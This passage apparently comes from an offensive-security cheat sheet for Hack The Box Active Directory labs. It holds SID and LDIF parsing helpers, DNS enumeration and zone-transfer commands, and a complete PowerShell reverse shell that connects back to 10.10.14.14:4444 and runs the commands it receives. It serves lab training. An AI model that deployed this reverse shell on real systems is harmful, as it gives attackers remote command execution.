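    subs = struct.unpack("<%dI" % count, raw[8:])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def sid_to_bytes(sid: str) -> bytes:
    """Inverse of bytes_to_sid, e.g. to build an LDAP filter on objectSid."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID string: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def split_sid(sid: str):
    """(domain SID, RID): the RID is the final sub-authority."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def sids_from_ldif(text: str) -> dict:
    """Map sAMAccountName -> (SID string, RID) from 'objectSid:: <base64>' LDIF lines."""
    result, name, sid = {}, None, None
    for line in text.splitlines() + [""]:
        if not line.strip():
            if name and sid:
                result[name] = (sid, split_sid(sid)[1])
            name = sid = None
        elif line.startswith("sAMAccountName: "):
            name = line.split(": ", 1)[1]
        elif line.startswith("objectSid:: "):
            sid = bytes_to_sid(base64.b64decode(line.split(":: ", 1)[1]))
    return result


def _entry(name: str, sid: str) -> str:
    # Constructed LDIF entry in the shape ldapsearch prints (binary attrs are base64 after '::').
    b64 = base64.b64encode(sid_to_bytes(sid)).decode()
    return "dn: CN=%s,CN=Users,DC=flight,DC=htb\nsAMAccountName: %s\nobjectSid:: %s\n\n" % (name, name, b64)


DOMAIN_SID = "S-1-5-21-1234567890-987654321-1122334455"   # constructed, not a real domain
SAMPLE_LDIF = "".join(_entry(n, DOMAIN_SID + "-%d" % r)
                      for n, r in [("Administrator", 500), ("krbtgt", 502), ("svc_apache", 1104)])

if __name__ == "__main__":
    # usage: ldapsearch ... "(objectClass=user)" sAMAccountName objectSid | python3 sids.py
    import sys
    text = SAMPLE_LDIF if sys.stdin.isatty() else sys.stdin.read()
    for name, (sid, rid) in sids_from_ldif(text).items():
        print("%-15s %-48s RID %-5d %s" % (name, sid, rid, WELL_KNOWN_RIDS.get(rid, "")))
```

RIDs below 1000 are well-known or built-in; RIDs from 1000 upward are allocated in creation order, which is why --rid-brute walks that range and why the RID of an account hints at how old it is.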

DNS Enumeration

# Find the DC hostname through the target's own DNS: point nslookup at it, then reverse-resolve 127.0.0.1 or the target IP
nslookup
> server <target_ip>
> 127.0.0.1
# OR
> <target_ip>

# DNS Zone Transfer
dig axfr authority.htb @10.10.11.222

# DNS Recon
dnsrecon -d flight.htb -a -n 10.10.11.187

Stable Reverse Shell Script

# https://github.com/0xmrsecurity/OSCP/tree/main/Reverse%20connection/Windows/Simple-One

# Save as shell.ps1 (the same TCPClient shell as the one-liner above) and run it with: powershell -ep bypass -File shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
